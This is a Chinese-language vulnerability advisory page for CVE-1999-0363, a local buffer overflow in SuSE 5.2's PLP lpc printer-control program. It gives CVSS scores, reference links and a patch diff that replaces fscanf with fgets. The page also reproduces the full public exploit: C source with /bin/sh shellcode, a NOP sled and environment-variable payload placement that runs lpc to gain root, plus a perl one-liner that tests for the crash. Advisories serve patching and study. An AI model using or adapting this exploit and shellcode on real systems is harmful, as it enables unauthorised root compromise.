CVE-1999-0363
CVSS7.2
发布时间 :1999-02-02 00:00:00
修订时间 :2008-09-09 08:34:25
NMCOE    

[原文]SuSE 5.2 PLP lpc program has a buffer overflow that leads to root compromise.


[CNNVD]S.u.S.E. 5.2 lpc漏洞(CNNVD-199902-008)

        SuSE 5.2 PLP lpc程序存在漏洞。该程序存在缓冲区溢出,导致根妥协。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:plp:line_printer_control
cpe:/o:suse:suse_linux:5.2SuSE SuSE Linux 5.2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0363
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0363
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199902-008
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/328
(UNKNOWN)  BID  328

- 漏洞信息

S.u.S.E. 5.2 lpc漏洞
高危 缓冲区溢出
1999-02-02 00:00:00 2005-05-02 00:00:00
本地  
        SuSE 5.2 PLP lpc程序存在漏洞。该程序存在缓冲区溢出,导致根妥协。

- 公告与补丁

        There is an alternative lpc suite that can be used, or the patch below.
        lpr, the alternative to lpc, is included in the S.u.S.E. 5.2 source library in the form of lpr-tlr-971016.tar.gz (or newer).
        If you wish to continue using the vulnerable version of lpc, apply the following patch:
        --- /usr/src/packages/SOURCES/origplp/plp-4.0.3/src/common/control_ops.c Thu Jun 15 14:09:12 1995
        +++ /usr/src/packages/SOURCES/newplp/plp-4.0.3/src/common/control_ops.c Wed Feb
        3 12:36:17 1999
        @@ -676,7 +676,7 @@
        att_mark = False;
        if ((afp = fopen_daemon (Attach_file, "r"))) { /* Try to open attach file */
        - if (fscanf (afp, "", afname) == 1) {
        + if (fgets (afname, sizeof(afname), afp) != NULL) {
        if (strsame (afname, Printer)) {
        fatal (XLOG_INFO, "Printer '' attached to itself", Printer);
        }
        @@ -1622,7 +1622,7 @@
        if ((s = C_abort ())) {
        if (stat (Attach_file, &statb) == 0) {
        if ((afp = fopen_daemon (Attach_file, "r"))) {
        - if (fscanf (afp, "", afname) != 1) {
        + if (fgets (afname, sizeof(afname), afp) != NULL) {
        fatal (XLOG_INFO, "attach file for printer corrupted!",
        Printer);
        }
        --- /usr/src/packages/SOURCES/origplp/plp-4.0.3/src/common/displayq.c Tue Aug
        29 12:44:35 1995
        +++ /usr/src/packages/SOURCES/newplp/plp-4.0.3/src/common/displayq.c Wed Feb
        3 12:35:37 1999
        @@ -99,7 +99,7 @@
        * check to see if attached to another printerq, alter printer if attached
        */
        if (Attach_file && *Attach_file && ((afp = fopen (Attach_file, "r")))) {
        - if (fscanf (afp, "", afname) == 1) {
        + if (fgets (afname, sizeof(afname), afp) != NULL) {
        if (strsame (afname, Printer)) {
        fatal (XLOG_INFO, "Printer '' attached to itself", Printer);
        }

- 漏洞信息 (19259)

S.u.S.E. 5.2 lpc Vulnerabilty (EDBID:19259)
linux local
1999-02-03 Verified
0 xnec
N/A [点击下载]
source: http://www.securityfocus.com/bid/328/info


The PLP Line Printer Control program, shipped with S.u.S.E. 5.2 is vulnerable to a local remote buffer overflow. You can determine whether you're vulnerable or not by typing 'lpc'. If you're presented with an lpc version number, you're vulnerable. The consequences of lpc exploitation are root access for a local user. 

/*

Standard overflow for x86 linux lpc. PLP Line Printer Control program, version 4.0.3. Tested on SuSE 5.2 (suidroot). Test your copy of /usr/bin/lpc by trying an /usr/bin/lpc attach lp `perl -e "print 'A' x 1000"`;lpc status lp The problematic code is in displayq.c and control_ops.c, where we attempt to fscanf() the lockfile's contents into a fixed length buffer. See the Bugtraq post for full fix information(www.geek-girl.com/bugtraq).

The buffer we're overflowing is 256bytes, and an offset of 0 works just fine. Try in increments of +-100 if it doesn't work for you.

Obviously this is a complete rip of Aleph1's standard overflow program from his paper "smashing the stack for fun and profit".

to compile: gcc -o xnec_lpc xnec_lpc.c

bugs: only sets uid=0, and you may have to have a printer defined (lp on my box).

greets to #sk1llz

-xnec xnec on EF and DALnet, xnec@inferno.tusculum.edu

*/ #include <stdlib.h>

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 356

#define DEFAULT_EGG_SIZE 2048

#define NOP 0x90

char pause;

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_esp(void) {

__asm__("movl %esp,%eax");

}

void main(int argc, char *argv[]) {

char *buff, *ptr, *egg;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;

int i, eggsize=DEFAULT_EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);

if (argc > 2) offset = atoi(argv[2]);

if (argc > 3) eggsize = atoi(argv[3]);

if (!(buff = malloc(bsize))) {

printf("Can't allocate memory.\n");

exit(0);

}

if (!(egg = malloc(eggsize))) {

printf("Can't allocate memory.\n");

exit(0);

}

addr = get_esp() - offset;

printf("Using address: 0x%x\n", addr);

printf("\nPLP Line Printer Control program, version 4.0.3 overflow.\n");

printf("Bug found by xnec, code ripped from Aleph1. After running this program, simply compile and run:\n---\n

#include <unistd.h>

void main(){system(\"/bin/bash\");}\n---\n");

scanf("%c", pause);

ptr = buff;

addr_ptr = (long *) ptr;

for (i = 0; i < bsize; i+=4)

*(addr_ptr++) = addr;

ptr = egg;

for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)

*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)

*(ptr++) = shellcode[i];

buff[bsize - 1] = '\0';

egg[eggsize - 1] = '\0';

memcpy(egg,"EGG=",4);

putenv(egg);

memcpy(buff,"RET=",4);

putenv(buff);

system("`which lpc` attach lp $RET; `which lpc` status lp");

} 		

- 漏洞信息

977
SuSE PLP lpc Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Workaround
Exploit Public Third-party Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

1999-02-03 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站